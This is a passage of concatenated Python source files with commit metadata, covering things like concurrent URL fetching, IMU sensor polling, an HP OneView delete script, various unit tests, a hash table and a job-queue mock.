    # Unique sentinel: cannot collide with any real url string.
    stop = object()
    parallelism = parallelism or len(urls)
    for i in xrange(parallelism):
        greenhouse.schedule(_queue_runner, args=(in_q, out_q, stop))
    for url in urls:
        in_q.put(url)
    # Collect exactly one result per submitted url (order of arrival varies).
    for url in urls:
        url, result = out_q.get()
        results[url] = result
    # Shut the workers down: one sentinel per worker.
    for i in xrange(parallelism):
        in_q.put(stop)
    return results
#
# the Queue example above is basically a small reimplementation of Pools
#
def _pool_job(url):
    """Pool worker: fetch one url, returning (url, body) so results can be
    matched back to their inputs."""
    return url, urllib2.urlopen(url).read()
def get_urls_pool(urls, parallelism=None):
    """Fetch *urls* via greenhouse.Pool; return {url: body}."""
    pool = greenhouse.Pool(_pool_job, parallelism or len(urls))
    pool.start()
    results = {}
    for url in urls:
        pool.put(url)
    # Pool.get() yields results in completion order, hence the (url, body)
    # pairing from the job function.
    for url in urls:
        url, result = pool.get()
        results[url] = result
    pool.close()
    return results
#
# this one returns a list of the results in an order corresponding to the
# arguments instead of a dictionary mapping them (to show off OrderedPool)
#
def _ordered_pool_job(url):
    """OrderedPool worker: fetch one url and return just the body (ordering
    is handled by the pool, so no url tagging is needed)."""
    return urllib2.urlopen(url).read()
def get_urls_ordered_pool(urls, parallelism=None):
    """Fetch *urls* concurrently; return bodies as a list matching the
    input order (not a dict, unlike the other variants)."""
    pool = greenhouse.OrderedPool(_ordered_pool_job, parallelism or len(urls))
    pool.start()
    for url in urls:
        pool.put(url)
    # OrderedPool caches out-of-order results and produces
    # them corresponding to the order in which they were put()
    results = [pool.get() for url in urls]
    pool.close()
    return results
#
# one last version, showcasing a further abstraction of OrderedPool
#
def get_urls_ordered_map(urls, parallelism=None):
    """Highest-level variant: greenhouse.pool.map runs the fetch lambda over
    *urls* with a pool of the given size and returns bodies in input order."""
    return greenhouse.pool.map(
        lambda u: urllib2.urlopen(u).read(),
        urls,
        pool_size=parallelism or len(urls))
| Python | 0.000001 | |
d8fc66417860e634bbb2a6d860628b645811d62c | Add WIP for Python example | examples/python/curieimu.py | examples/python/curieimu.py | #!/usr/bin/python
# Author: Ron Evans (@deadprogram)
# Copyright (c) 2016 Intel Corporation.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
import time, sys, signal, atexit
import pyupm_curieimu as curieimu
## Exit handlers ##
# This stops python from printing a stacktrace when you hit control-C
def SIGINTHandler(signum, frame):
    # Convert Ctrl-C into a clean SystemExit (no traceback spew).
    raise SystemExit
# This lets you run code on exit,
# including functions from myAccelrCompass
def exitHandler():
    # NOTE: Python 2 print statement.
    print "Exiting"
    sys.exit(0)
# Register exit handlers
atexit.register(exitHandler)
signal.signal(signal.SIGINT, SIGINTHandler)
# Poll the IMU once per second and print the acceleration components.
while(1):
    # Get the acceleration
    curieimu.updateAccel();
    outputStr = "acc: gX {0} - gY {1} - gZ {2}".format(
        curieimu.getAccelX(), curieimu.getAccelY(),
        curieimu.getAccelZ())
    print outputStr
    print " "
    time.sleep(1)
| Python | 0 | |
b78fb81cba34992bb84ed3814aae04ce05ef913f | Add del-uri.py example script | examples/scripts/del-uri.py | examples/scripts/del-uri.py | #!/usr/bin/env python3
###
# (C) Copyright (2012-2015) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
import sys
if sys.version_info < (3, 4):
raise Exception("Must use Python 3.4 or later")
import hpOneView as hpov
from pprint import pprint
def acceptEULA(con):
    """Accept the appliance EULA if it has not been accepted yet.

    Failures are reported on stdout but never raised, so a login attempt
    can still proceed afterwards.
    """
    # See if we need to accept the EULA before we try to log in.
    try:
        # Bug fix: get_eula_status() used to be called an extra time before
        # the try block with the result discarded -- a wasted API round-trip
        # that could also raise outside the exception handler.
        if con.get_eula_status() is True:
            print("EULA display needed")
            con.set_eula('no')
    except Exception as e:
        print('EXCEPTION:')
        print(e)
def login(con, credential):
    """Log in to the appliance with the given credentials.

    A failed login is reported on stdout instead of raising, preserving the
    original best-effort behaviour.
    """
    try:
        con.login(credential)
    except Exception:
        # Bug fix: the original bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; only genuine errors should be caught here.
        print('Login failed')
def deluri(con, uri):
    """Issue a DELETE for the resource at *uri* and pretty-print the reply."""
    response = con.delete(uri)
    pprint(response)
def main():
    """Parse command-line options, connect to the appliance and delete the
    resource identified by the given URI."""
    parser = argparse.ArgumentParser(add_help=True,
                        formatter_class=argparse.RawTextHelpFormatter,
                        description='''
    Delete resource by URI
    Usage: ''')
    parser.add_argument('-a', dest='host', required=True,
                        help='''
    HP OneView Appliance hostname or IP address''')
    parser.add_argument('-u', dest='user', required=False,
                        default='Administrator',
                        help='''
    HP OneView Username''')
    parser.add_argument('-p', dest='passwd', required=True,
                        help='''
    HP OneView Password''')
    parser.add_argument('-c', dest='cert', required=False,
                        help='''
    Trusted SSL Certificate Bundle in PEM (Base64 Encoded DER) Format''')
    parser.add_argument('-y', dest='proxy', required=False,
                        help='''
    Proxy (host:port format''')
    parser.add_argument('-i', dest='uri', required=False,
                        help='''
    URI of the resource to delete''')
    args = parser.parse_args()
    credential = {'userName': args.user, 'password': args.passwd}
    con = hpov.connection(args.host)
    sec = hpov.security(con)
    # Optional transport configuration before authenticating.
    if args.proxy:
        con.set_proxy(args.proxy.split(':')[0], args.proxy.split(':')[1])
    if args.cert:
        con.set_trusted_ssl_bundle(args.cert)
    login(con, credential)
    acceptEULA(con)
    # Perform the actual DELETE and print the appliance's response.
    deluri(con, args.uri)
import sys
import argparse
sys.exit(main())
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
| Python | 0.000001 | |
5cf3ff125226ddbf2edfad9d3c0d6ea2d59618ce | add missing file | pygraphviz/tests/test.py | pygraphviz/tests/test.py | #!/usr/bin/env python
import sys
from os import path,getcwd
def run(verbosity=1,doctest=False,numpy=True):
"""Run PyGraphviz tests.
Parameters
----------
verbosity: integer, optional
Level of detail in test reports. Higher numbers provide more detail.
doctest: bool, optional
True to run doctests in code modules
"""
try:
import nose
except ImportError:
raise ImportError(\
"The nose package is needed to run the tests.")
sys.stderr.write("Running PyGraphiz tests:")
nx_install_dir=path.join(path.dirname(__file__), path.pardir)
# stop if running from source directory
if getcwd() == path.abspath(path.join(nx_install_dir,path.pardir)):
raise RuntimeError("Can't run tests from source directory.\n"
"Run 'nosetests' from the command line.")
argv=[' ','--verbosity=%d'%verbosity,
'-w',nx_install_dir,
'-exe']
if doctest:
argv.extend(['--with-doctest','--doctest-extension=txt'])
nose.run(argv=argv)
if __name__=="__main__":
run()
| Python | 0.000003 | |
2af53a39096c0eab9d95c304c802281fe3c580ae | Make JAX CompiledFunction objects pickle-able. | tests/pickle_test.py | tests/pickle_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for interoperability between JAX and pickling libraries."""
import pickle
import unittest
from absl.testing import absltest
try:
import cloudpickle
except ImportError:
cloudpickle = None
import jax
from jax.config import config
from jax import test_util as jtu
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
  # Verifies that jitted (CompiledFunction) objects survive a cloudpickle
  # round trip, including closures over other jitted functions.
  @unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
  @unittest.skipIf(jax.lib._xla_extension_version < 31,
                   "Requires jaxlib 0.1.71")
  def testPickleOfJittedFunctions(self):
    @jax.jit
    def f(x, y):
      return x * y

    @jax.jit
    def g(z):
      return f(z, z + 77)  # noqa: F821

    expected = g(32)
    s = cloudpickle.dumps(g)
    # Delete the originals so the unpickled copy cannot lean on them.
    del f, g

    g_unpickled = pickle.loads(s)
    actual = g_unpickled(32)
    self.assertEqual(expected, actual)

if __name__ == "__main__":
  absltest.main(testLoader=jtu.JaxTestLoader())
| Python | 0.000032 | |
c4ee6bb374e07a07bac8b8f52cf94d7d474e0e33 | Fix typo in test comment | tests/test_config.py | tests/test_config.py | import os
from pathlib import Path
from rhizo.config import load_config
def check_config(config):
assert config.output_path == '/foo/bar'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 2
assert round(config.sub_config.c - 3.14, 4) == 0
def _load_test_config(filename, use_environ=False):
"""Load a config file from the test_data subdirectory."""
path = Path(__file__).parent / 'test_data' / filename
return load_config(str(path), use_environ)
def test_text_config():
config = _load_test_config('sample_config.txt')
check_config(config)
def test_environment_config():
os.environ['RHIZO_SUB_CONFIG'] = 'a: override\nb: 3'
os.environ['RHIZO_OTHER_SETTING'] = 'from_env'
config = _load_test_config('sample_config.json', True)
# Not overridden in environment
assert config.output_path == '/foo/bar'
# Overridden in environment; dict value in environment
assert config.sub_config == { "a": "override", "b": 3 }
# Only specified in environment
assert config.other_setting == 'from_env'
def test_json_config():
# Make sure environment override only happens if requested
os.environ['RHIZO_OUTPUT_PATH'] = 'overridden'
config = _load_test_config('sample_config.json')
check_config(config)
def test_hjson_config():
config = _load_test_config('sample_config.hjson')
check_config(config)
def test_config_update():
config = _load_test_config('sample_config.hjson')
config.update(_load_test_config('update.hjson'))
assert config.output_path == '/foo/test'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 3
| import os
from pathlib import Path
from rhizo.config import load_config
def check_config(config):
assert config.output_path == '/foo/bar'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 2
assert round(config.sub_config.c - 3.14, 4) == 0
def _load_test_config(filename, use_environ=False):
"""Load a config file from the test_data subdirectory."""
path = Path(__file__).parent / 'test_data' / filename
return load_config(str(path), use_environ)
def test_text_config():
config = _load_test_config('sample_config.txt')
check_config(config)
def test_environment_config():
    """RHIZO_-prefixed environment variables override file settings."""
    os.environ['RHIZO_SUB_CONFIG'] = 'a: override\nb: 3'
    os.environ['RHIZO_OTHER_SETTING'] = 'from_env'
    config = _load_test_config('sample_config.json', True)
    # Not overridden in environment
    assert config.output_path == '/foo/bar'
    # Overridden in environment; dict value in environment
    assert config.sub_config == { "a": "override", "b": 3 }
    # Only specified in environment
    assert config.other_setting == 'from_env'
def test_json_config():
# Make sure environment override only happens if requested
os.environ['RHIZO_OUTPUT_PATH'] = 'overridden'
config = _load_test_config('sample_config.json')
check_config(config)
def test_hjson_config():
config = _load_test_config('sample_config.hjson')
check_config(config)
def test_config_update():
config = _load_test_config('sample_config.hjson')
config.update(_load_test_config('update.hjson'))
assert config.output_path == '/foo/test'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 3
| Python | 0.000092 |
8006d142a00a6dae70850b3c9d816f745f252260 | create settings file with parent_separator setting | cms/settings.py | cms/settings.py | from django.conf import settings
PARENT_SEPARATOR = getattr(settings, 'MINICMS_PARENT_SEPARATOR', '/')
| Python | 0 | |
7c8d43b16d6b47555caeb00234590bc8d335ed71 | test markup | tests/test_markup.py | tests/test_markup.py | import pytest
from rich.markup import MarkupError, _parse, render
from rich.text import Span
def test_parse():
result = list(_parse("[foo]hello[/foo][bar]world[/][[escaped]]"))
expected = [
(None, "[foo]"),
("hello", None),
(None, "[/foo]"),
(None, "[bar]"),
("world", None),
(None, "[/]"),
("[", None),
("escaped", None),
("]", None),
]
assert result == expected
def test_render():
result = render("[bold]FOO[/bold]")
assert str(result) == "FOO"
assert result.spans == [Span(0, 3, "bold")]
def test_markup_error():
with pytest.raises(MarkupError):
assert render("foo[/]")
with pytest.raises(MarkupError):
assert render("foo[/bar]")
with pytest.raises(MarkupError):
assert render("[foo]hello[/bar]")
| Python | 0.000001 | |
93b2972c41855511cddf57029ab8fce0dccd9265 | add hashtable using open addressing | ds/hash.py | ds/hash.py | '''HashTable using open addressing'''
class HashTable(object):
    """Fixed-size hash table using open addressing with linear probing.

    Keys are assumed to be integers. There is no delete operation, so a
    ``None`` slot reliably terminates any probe chain.
    """

    def __init__(self):
        self.size = 11                   # number of slots
        self.keys = [None] * self.size
        self.data = [None] * self.size

    def hash(self, key):
        """Home slot for *key*."""
        return key % self.size

    def rehash(self, key):
        """Next slot in the linear probe sequence."""
        return (key + 1) % self.size

    def put(self, key, data):
        """Insert *key* or replace its value if already present.

        Bug fixes vs. the original: the old loop advanced the probe
        *before* comparing keys, so re-putting a key that sat in its home
        slot stored a duplicate instead of replacing; and a full table
        with an absent key probed forever. Now raises ValueError when the
        table is full and *key* is not present.
        """
        slot = self.hash(key)
        for _ in range(self.size):
            if self.keys[slot] is None:
                self.keys[slot] = key
                self.data[slot] = data
                return
            if self.keys[slot] == key:
                self.data[slot] = data   # replace in place
                return
            slot = self.rehash(slot)
        raise ValueError("hash table is full")

    def get(self, key):
        """Return the value stored for *key*, or None when absent.

        Stops at the first empty slot: without deletion, *key* can never
        live beyond a break in its probe chain (the original scanned the
        whole table before giving up).
        """
        slot = self.hash(key)
        for _ in range(self.size):
            if self.keys[slot] is None:
                return None
            if self.keys[slot] == key:
                return self.data[slot]
            slot = self.rehash(slot)
        return None

    def __setitem__(self, key, data):
        self.put(key, data)

    def __getitem__(self, key):
        return self.get(key)

    def __str__(self):
        return ', '.join(map(str, enumerate(self.data)))
if __name__ == '__main__':
H = HashTable()
H[54] = "cat"
H[26] = "dog"
H[93] = "lion"
H[17] = "tiger"
H[77] = "bird"
H[31] = "cow"
H[44] = "goat"
H[55] = "pig"
H[20] = "chicken"
print(H)
H[9] = "duck"
print(H[9])
print(H)
| Python | 0.000001 | |
256e1bb8dd543051fe51b3b669ab4a10c0556f40 | add back pytext | tests/test_pytext.py | tests/test_pytext.py | import unittest
from pytext.config.field_config import FeatureConfig
from pytext.data.featurizer import InputRecord, SimpleFeaturizer
class TestPyText(unittest.TestCase):
def test_tokenize(self):
featurizer = SimpleFeaturizer.from_config(
SimpleFeaturizer.Config(), FeatureConfig()
)
tokens = featurizer.featurize(InputRecord(raw_text="At eight o'clock")).tokens
self.assertEqual(['at', 'eight', "o'clock"], tokens)
| Python | 0.000001 | |
ea0b0e3b3ca2b3ad51ae9640f7f58d9f2737f64c | Split out runner | dox/runner.py | dox/runner.py | # Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'Runner',
]
import sh
class Runner(object):
    """Runs a command in an image; currently only logs what it would do."""

    def __init__(self, args):
        # args: parsed CLI options; only .rebuild is consulted here.
        self.args = args

    def run(self, image, command):
        print("Going to run {0} in {1}".format(command, image))
        if not self.args.rebuild:
            return
        print("Need to rebuild")
        sh.ls()
| Python | 0.015951 | |
af75f727e5ec22020c8d91af6a0302ea0e4bda74 | Support for http://docs.oasis-open.org/security/saml/Post2.0/sstc-request-initiation-cd-01.html in the metadata. | src/saml2/extension/reqinit.py | src/saml2/extension/reqinit.py | #!/usr/bin/env python
#
# Generated Thu May 15 13:58:36 2014 by parse_xsd.py version 0.5.
#
import saml2
from saml2 import md
NAMESPACE = 'urn:oasis:names:tc:SAML:profiles:SSO:request-init'
class RequestInitiator(md.EndpointType_):
"""The urn:oasis:names:tc:SAML:profiles:SSO:request-init:RequestInitiator
element """
c_tag = 'RequestInitiator'
c_namespace = NAMESPACE
c_children = md.EndpointType_.c_children.copy()
c_attributes = md.EndpointType_.c_attributes.copy()
c_child_order = md.EndpointType_.c_child_order[:]
c_cardinality = md.EndpointType_.c_cardinality.copy()
def request_initiator_from_string(xml_string):
return saml2.create_class_from_xml_string(RequestInitiator, xml_string)
ELEMENT_FROM_STRING = {
RequestInitiator.c_tag: request_initiator_from_string,
}
ELEMENT_BY_TAG = {
'RequestInitiator': RequestInitiator,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
| Python | 0 | |
cfa5b544c3d44a7440feca006c01bbd72ecc0286 | Test arena constants | test/test_arena.py | test/test_arena.py | from support import lib,ffi
from qcgc_test import QCGCTest
class ArenaTestCase(QCGCTest):
    """Checks the arena size constants exported by the qcgc C library."""

    def test_size_calculations(self):
        # Recompute the derived arena sizes from the exponent and compare
        # with the values the library exports.
        exp = lib.QCGC_ARENA_SIZE_EXP
        size = 2**exp
        # NOTE(review): "/" is float division on Python 3; these ratios are
        # presumably exact powers of two, but confirm the comparisons against
        # the C integer constants still hold under the interpreter in use.
        bitmap = size / 128
        effective_cells = (size - 2 * bitmap) / 16
        self.assertEqual(size, lib.qcgc_arena_size)
        self.assertEqual(bitmap, lib.qcgc_arena_bitmap_size)
        self.assertEqual(effective_cells, lib.qcgc_arena_cells_count)
| Python | 0.000001 | |
12270bc14b44343b4babef3b6445074685b59bd7 | Create histogram.py | python/histogram.py | python/histogram.py | import sys
histogram = dict()
bin_width = 5
max_index = 0
for line in sys.stdin:
if not line:
continue
number = int(line)
bin_index = number / bin_width
if bin_index not in histogram:
histogram[bin_index] = 0
histogram[bin_index] = histogram[bin_index] + 1
if bin_index > max_index:
max_index = bin_index
for index in range(max_index) + [max_index + 1]:
if index not in histogram:
histogram[index] = 0
count = histogram[index]
if count == None:
count = 0
print "[{0}, {1}> : {2}".format(index * bin_width, (index + 1) * bin_width, count)
| Python | 0.00286 | |
8b6b30997816bae1255c3e035851b8e6edb5e4c7 | add a test | python/test/test.py | python/test/test.py | import unittest
import os
import couchapp.utils
class CouchAppTest(unittest.TestCase):
def testInCouchApp(self):
dir_, file_ = os.path.split(__file__)
if dir_:
os.chdir(dir_)
startdir = os.getcwd()
try:
os.chdir("in_couchapp")
os.chdir("installed")
cwd = os.getcwd()
self.assertEquals(couchapp.utils.in_couchapp(), cwd,
"in_couchapp() returns %s" %
couchapp.utils.in_couchapp())
os.chdir(os.path.pardir)
os.chdir("no_install")
self.assert_(not couchapp.utils.in_couchapp(),
"Found a couchapp at %s but didn't expect one!"
% couchapp.utils.in_couchapp())
finally:
os.chdir(startdir)
if __name__ == "__main__":
unittest.main()
| Python | 0.000002 | |
952438d97fc0c96afaf505469cc7b9cb0c9f287d | Add config file with the list of relays availables | relay_api/conf/config.py | relay_api/conf/config.py | # List of available relays
relays = [
{
"id": 1,
"gpio": 20,
"name": "relay 1"
},
{
"id": 2,
"gpio": 21,
"name": "relay 2"
}
]
| Python | 0 | |
b5083af1cce5fb5b9c7bb764b18edce8640bd3a1 | add utilLogger.py from toLearn/ and update to v0.4 | utilLogger.py | utilLogger.py | import os.path
import datetime
'''
v0.4 2015/11/30
- comment out test run
- add from sentence to import CUtilLogger
v0.3 2015/11/30
- change array declaration to those using range()
- __init__() does not take saveto arg
- automatically get file name based on the date
v0.2 2015/11/30
- update add() to handle auto save feature
v0.1 2015/11/30
- add save()
- add add()
- add __init__()
'''
class CUtilLogger:
    """Buffered line logger: flushes to ``YYMMDD.log`` every 5 messages."""

    def __init__(self):
        self.idx = 0             # number of buffered messages
        self.bufferNum = 5       # auto-save threshold
        self.strs = [0] * 10     # buffer; only the first idx entries are live

    def clear(self):
        """Blank the live entries and rewind the buffer index."""
        for i in range(self.idx):
            self.strs[i] = ""
        self.idx = 0

    def add(self, str):
        """Buffer one message; save and clear once the threshold is reached."""
        self.strs[self.idx] = str
        self.idx += 1
        if self.idx >= self.bufferNum:
            self.save()
            self.clear()

    def save(self):
        """Append the buffered messages to today's ``YYMMDD.log`` file."""
        filename = datetime.date.today().strftime("%y%m%d") + ".log"
        with open(filename, "a") as logfd:
            for i in range(self.idx):
                logfd.write(self.strs[i] + "\r\n")
# Usage
'''
from utilLogger import CUtilLogger
logger = CUtilLogger()
for loop in range(0, 31):
logger.add("test")
logger.save() # to save the rest
logger = None
'''
| Python | 0 | |
99f5d264ab88573e0541c529eca905b8a1d16873 | Bump to 0.5.3 dev. | rbtools/__init__.py | rbtools/__init__.py | #
# __init__.py -- Basic version and package information
#
# Copyright (c) 2007-2009 Christian Hammond
# Copyright (c) 2007-2009 David Trowbridge
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The version of RBTools
#
# This is in the format of:
#
# (Major, Minor, Micro, alpha/beta/rc/final, Release Number, Released)
#
VERSION = (0, 5, 3, 'alpha', 0, False)
def get_version_string():
    """Return the display version, e.g. ``0.5.3 alpha 0 (dev)``."""
    major, minor, micro, tag, rel = VERSION[:5]
    parts = ['%s.%s' % (major, minor)]

    if micro:
        parts.append(".%s" % micro)

    if tag != 'final':
        if tag == 'rc':
            parts.append(' RC%s' % rel)
        else:
            parts.append(' %s %s' % (tag, rel))

    if not is_release():
        parts.append(" (dev)")

    return ''.join(parts)
def get_package_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
version += '%s%s' % (VERSION[3], VERSION[4])
return version
def is_release():
return VERSION[5]
__version_info__ = VERSION[:-1]
__version__ = get_package_version()
| #
# __init__.py -- Basic version and package information
#
# Copyright (c) 2007-2009 Christian Hammond
# Copyright (c) 2007-2009 David Trowbridge
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The version of RBTools
#
# This is in the format of:
#
# (Major, Minor, Micro, alpha/beta/rc/final, Release Number, Released)
#
VERSION = (0, 5, 2, 'final', 0, True)
def get_version_string():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
if VERSION[3] == 'rc':
version += ' RC%s' % VERSION[4]
else:
version += ' %s %s' % (VERSION[3], VERSION[4])
if not is_release():
version += " (dev)"
return version
def get_package_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
version += '%s%s' % (VERSION[3], VERSION[4])
return version
def is_release():
return VERSION[5]
__version_info__ = VERSION[:-1]
__version__ = get_package_version()
| Python | 0 |
90948c62d1d01800c6a75dd5f15d7fef334dc66f | Add python unittests | noticeboard/test_noticeboard.py | noticeboard/test_noticeboard.py | import os
import json
import tempfile
import unittest
from noticeboard import noticeboard
class TestNoticeboard(unittest.TestCase):
def setUp(self):
self.fd, noticeboard.app.config["DATABASE"] = tempfile.mkstemp()
noticeboard.app.config["TESTING"] = True
self.app = noticeboard.app.test_client()
noticeboard.init_db()
def tearDown(self):
os.close(self.fd)
os.unlink(noticeboard.app.config["DATABASE"])
def decode_json(self, resp):
return json.loads(resp.data.decode('utf-8'))
def test_no_note_by_default(self):
resp = self.app.get("/api/v1/notes")
data = self.decode_json(resp)
self.assertEqual(data["notes"], [])
def test_creating_note_with_text(self):
text = "Foo Bar Baz"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
data = self.decode_json(resp)
self.assertEqual(data["note"]["text"], text)
def test_created_note_can_be_retrieved(self):
text = "Hello World!"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
created_note = self.decode_json(resp)["note"]
resp = self.app.get("/api/v1/notes/{}".format(created_note["id"]))
retrieved_note = self.decode_json(resp)["note"]
self.assertEqual(retrieved_note, created_note)
def test_created_note_shows_up_in_notes(self):
text = "Hello, 世界!"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
note1 = self.decode_json(resp)["note"]
text = "This is fun!"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
note2 = self.decode_json(resp)["note"]
resp = self.app.get("/api/v1/notes")
notes = self.decode_json(resp)["notes"]
self.assertIn(note1, notes)
self.assertIn(note2, notes)
| Python | 0.000003 | |
17fcdd9a01be24ad9562e5a558e2dd65a84d1a19 | Add missing tests/queuemock.py | tests/queuemock.py | tests/queuemock.py | # -*- coding: utf-8 -*-
#
# 2019-01-07 Friedrich Weber <friedrich.weber@netknights.it>
# Implement queue mock
#
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNE7SS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import functools
import mock
from privacyidea.lib.queue import get_job_queue
from privacyidea.config import TestingConfig
from privacyidea.lib.queue.promise import ImmediatePromise
from privacyidea.lib.queue.base import BaseQueue, QueueError
from tests.base import OverrideConfigTestCase
class FakeQueue(BaseQueue):
"""
A queue class that keeps track of enqueued jobs, for usage in unit tests.
"""
def __init__(self, options):
BaseQueue.__init__(self, options)
self._jobs = {}
self.reset()
@property
def jobs(self):
return self._jobs
def reset(self):
self.enqueued_jobs = []
def add_job(self, name, func, fire_and_forget=False):
if name in self._jobs:
raise QueueError(u"Job {!r} already exists".format(name))
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if fire_and_forget:
return None
else:
return result
self._jobs[name] = wrapper
def enqueue(self, name, args, kwargs):
if name not in self._jobs:
raise QueueError(u"Unknown job: {!r}".format(name))
self.enqueued_jobs.append((name, args, kwargs))
return ImmediatePromise(self._jobs[name](*args, **kwargs))
class MockQueueTestCase(OverrideConfigTestCase):
"""
A test case class which has a mock job queue set up.
You can check the enqueued jobs with::
queue = get_job_queue()
self.assertEqual(queue.enqueued_jobs, ...)
The ``enqueued_jobs`` attribute is reset for each test case.
"""
class Config(TestingConfig):
PI_JOB_QUEUE_CLASS = "fake"
@classmethod
def setUpClass(cls):
""" override privacyidea.config.config["testing"] with the inner config class """
